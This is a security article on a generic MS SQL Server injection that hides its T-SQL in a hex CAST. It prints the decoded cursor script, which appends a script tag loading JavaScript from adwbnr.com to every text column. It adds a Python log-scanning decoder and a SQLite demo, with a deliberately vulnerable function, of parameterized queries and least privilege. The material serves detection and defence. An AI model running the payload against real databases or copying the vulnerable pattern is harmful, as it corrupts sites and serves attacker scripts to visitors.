Over the past few months a new breed of SQL Injection attack has started to show up in web server logs across the globe. These attacks are generic: they work against any web application that passes unsanitized input to an MS SQL Server back end, and they don't need to be customized for each target.

How they work:
Like all SQL Injection attacks, this one looks for pages that access an MS SQL database without sanitizing (or parameterizing) their database inputs. The attack appends a piece of T-SQL code to the end of a query string value, similar to this:

	DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C41
	....[more hex code]
	26C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);--
What this code does is create a variable holding a hex-encoded string (encoded, not encrypted: the hex digits are simply the bytes of the script, which keeps keywords like UPDATE and CURSOR out of the request and lets the payload pass naive keyword filters) and then execute that variable as a T-SQL batch. Decoding the hex in the example above gives this:

	DECLARE @T VARCHAR(255),@C VARCHAR(255)

	DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM 
	sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' 
	AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)

	OPEN Table_Cursor

	FETCH NEXT FROM Table_Cursor INTO @T,@C

	WHILE(@@FETCH_STATUS=0)
		BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=
		RTRIM(CONVERT(VARCHAR(4000),['+@C+']))
		+''<script src=http://www.adwbnr.com/b.js></script>''')
		FETCH NEXT FROM Table_Cursor INTO @T,@C
	END

	CLOSE Table_Cursor

	DEALLOCATE Table_Cursor

This code walks every user table (sysobjects xtype 'U') and every column of a text type (syscolumns xtype 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar) and appends a '<script>' tag pointing at a JavaScript file on an attacker-controlled site to every value. Any page that later renders the corrupted data serves that tag, so the visitor's browser loads the off-site script: the injection turns the whole database into a stored cross-site scripting payload. Because the UPDATE statements are built from the system tables at run time, the attacker needs no knowledge of the application's schema, which is what makes the attack generic.
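The decoding described above is also what a responder does with a captured request. The following is an added example, not code from the original article: a Python script that scans web server log lines for the generic carrier (DECLARE ... CAST(0x...) ... EXEC), decodes the hex blob back into the T-SQL the server ran, and pulls out the injected script URL as an indicator to block. It handles the NVARCHAR variant (UTF-16LE hex) as well as the VARCHAR one shown on this page. The log lines and the hex blob are constructed here for the example (the blob is built from the decoded script above so it runs offline; real ones run to thousands of hex digits); the log format is assumed.

```python
import re
from urllib.parse import unquote_plus

# The carrier seen in the logs: declare a variable, fill it from a hex-encoded
# CAST, execute it. Also matches the NVARCHAR variant, whose hex is UTF-16LE.
PAYLOAD_RE = re.compile(
    r"DECLARE\s+@(?P<var>\w+)\s+N?VARCHAR\(\d+\)\s*;?\s*"
    r"SET\s+@(?P=var)\s*=\s*CAST\(0x(?P<hex>[0-9A-Fa-f]+)\s+AS\s+(?P<ctype>N?VARCHAR)\(\d+\)\)\s*;?\s*"
    r"EXEC\s*\(\s*@(?P=var)\s*\)",
    re.IGNORECASE,
)
SCRIPT_SRC_RE = re.compile(r"<script\s+src=[\"']?([^\"'>\s]+)", re.IGNORECASE)


def decode_cast_payload(hex_blob: str, nvarchar: bool = False) -> str:
    """Turn the 0x... blob back into the T-SQL the server actually executed."""
    if len(hex_blob) % 2:
        raise ValueError("odd-length hex: the log line is probably truncated")
    raw = bytes.fromhex(hex_blob)
    # VARCHAR payloads are one byte per character; NVARCHAR payloads are UTF-16LE.
    return raw.decode("utf-16-le" if nvarchar else "latin-1")


def extract_script_srcs(tsql: str) -> list:
    """Pull the injected <script src=...> URLs out of decoded T-SQL (the IOC to block)."""
    return SCRIPT_SRC_RE.findall(tsql)


def find_injections(log_lines) -> list:
    """Scan raw (still URL-encoded) log lines; return one record per hit."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        m = PAYLOAD_RE.search(unquote_plus(line))
        if not m:
            continue
        tsql = decode_cast_payload(m.group("hex"), nvarchar=m.group("ctype").upper() == "NVARCHAR")
        hits.append({"line_no": line_no, "decoded_sql": tsql, "script_srcs": extract_script_srcs(tsql)})
    return hits


# Constructed sample data (not from the original article). The hex blob is built
# here from the decoded script so the example runs offline.
INJECTED_TSQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) "
    "DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b "
    "WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))"
    "+''<script src=http://www.adwbnr.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
HEX_BLOB = INJECTED_TSQL.encode("ascii").hex().upper()

SAMPLE_LOG_LINES = [  # assumed log format: date time method path query status
    "2008-05-12 03:14:07 GET /products.asp id=1 200",
    "2008-05-12 03:14:09 GET /products.asp id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + HEX_BLOB + "%20AS%20VARCHAR(4000));EXEC(@S);-- 200",
    "2008-05-12 03:14:11 GET /news.asp id=12 200",
]

if __name__ == "__main__":
    for hit in find_injections(SAMPLE_LOG_LINES):
        print("line %d injects script(s) from %s" % (hit["line_no"], hit["script_srcs"]))
        print(hit["decoded_sql"])
```

Run it over the real access logs and the decoded batch tells you exactly which tag was appended, which is the string you will need to search for and strip from the database afterwards.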

How to prevent it:
The root cause is the injection itself, so the first line of defence is to stop untrusted input from reaching the server as SQL text: use parameterized queries (stored procedures called with parameters, or the parameter objects of your data-access library) instead of concatenating query string values into T-SQL, and validate that numeric identifiers really are numeric before using them. The second line of defence, and what limits the damage when an injection does get through, is the permissions set for the database users in MS SQL. Be sure that the login the website application uses to connect has permission only on the table(s) it needs, and only the rights it needs on them (a page that only reads product data needs SELECT, not UPDATE), and, more importantly, make sure it cannot read the sysobjects and syscolumns tables. These tables describe every table and column in the database, and this attack relies on them to find what to overwrite without knowing anything about your schema; a login that cannot enumerate them (on SQL Server 2005 and later the catalog views already hide objects a login holds no permission on, so granting as little as possible is the effective control) cannot run this payload even if the injection succeeds. Finally, fixing the code does not clean the data: search the text columns for the injected '<script' tag and remove it, or the site keeps serving the attacker's JavaScript.
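Both defences side by side, as an added example that is not part of the original article. Python's sqlite3 module is used as a stand-in for the site's MS SQL database so it runs offline; the page's cursor payload does not run on SQLite, so the constructed attacker input appends a single UPDATE with the same effect on one table. The table and column names are hypothetical. executescript() stands in for a driver that executes the whole appended batch, and PRAGMA query_only stands in for a database login that holds SELECT but not UPDATE on the table.

```python
import sqlite3

# Constructed attacker input as it would arrive in the query string. It is a
# simplified stand-in for the page's payload: one appended UPDATE on one table.
INJECTED_ID = ("1;UPDATE products SET name = name || "
               "'<script src=http://www.adwbnr.com/b.js></script>'")


def fresh_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's database, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);"
        "INSERT INTO products(id, name) VALUES (1, 'Widget'), (2, 'Gadget');"
    )
    return conn


def product_names(conn) -> list:
    return [row[0] for row in conn.execute("SELECT name FROM products ORDER BY id")]


def lookup_vulnerable(conn, product_id: str) -> None:
    # The query string value is pasted into the SQL text and the whole batch
    # is handed to the driver, which is exactly the pattern the attack relies on.
    # executescript() stands in for a driver that runs multi-statement batches.
    conn.executescript("SELECT name FROM products WHERE id = " + product_id)


def lookup_parameterized(conn, product_id: str) -> list:
    # The value travels as a bound parameter, never as SQL text, so the
    # ";UPDATE ..." tail is just a string that matches no id.
    rows = conn.execute("SELECT name FROM products WHERE id = ?", (product_id,))
    return [row[0] for row in rows]


def lookup_vulnerable_least_privilege(conn, product_id: str) -> bool:
    """Same vulnerable code, on a connection that may only read.

    PRAGMA query_only stands in for a login that holds SELECT but not UPDATE:
    the injection still happens, the damage does not. Returns True when the
    appended UPDATE was refused.
    """
    conn.execute("PRAGMA query_only = ON")
    try:
        lookup_vulnerable(conn, product_id)
    except sqlite3.OperationalError:
        return True
    return False


def run_demo() -> dict:
    results = {}
    conn = fresh_db()
    lookup_vulnerable(conn, INJECTED_ID)
    results["after_vulnerable"] = product_names(conn)

    conn = fresh_db()
    results["parameterized_rows"] = lookup_parameterized(conn, INJECTED_ID)
    results["parameterized_rows_benign"] = lookup_parameterized(conn, "1")
    results["after_parameterized"] = product_names(conn)

    conn = fresh_db()
    results["least_privilege_blocked"] = lookup_vulnerable_least_privilege(conn, INJECTED_ID)
    results["after_least_privilege"] = product_names(conn)
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The first run shows every row picking up the script tag; the parameterized run returns no rows for the hostile value, returns the right row for a benign id, and leaves the data untouched; the read-only run shows the injection still reaching the server but the UPDATE being refused, which is the whole point of granting the website login nothing beyond what its pages need.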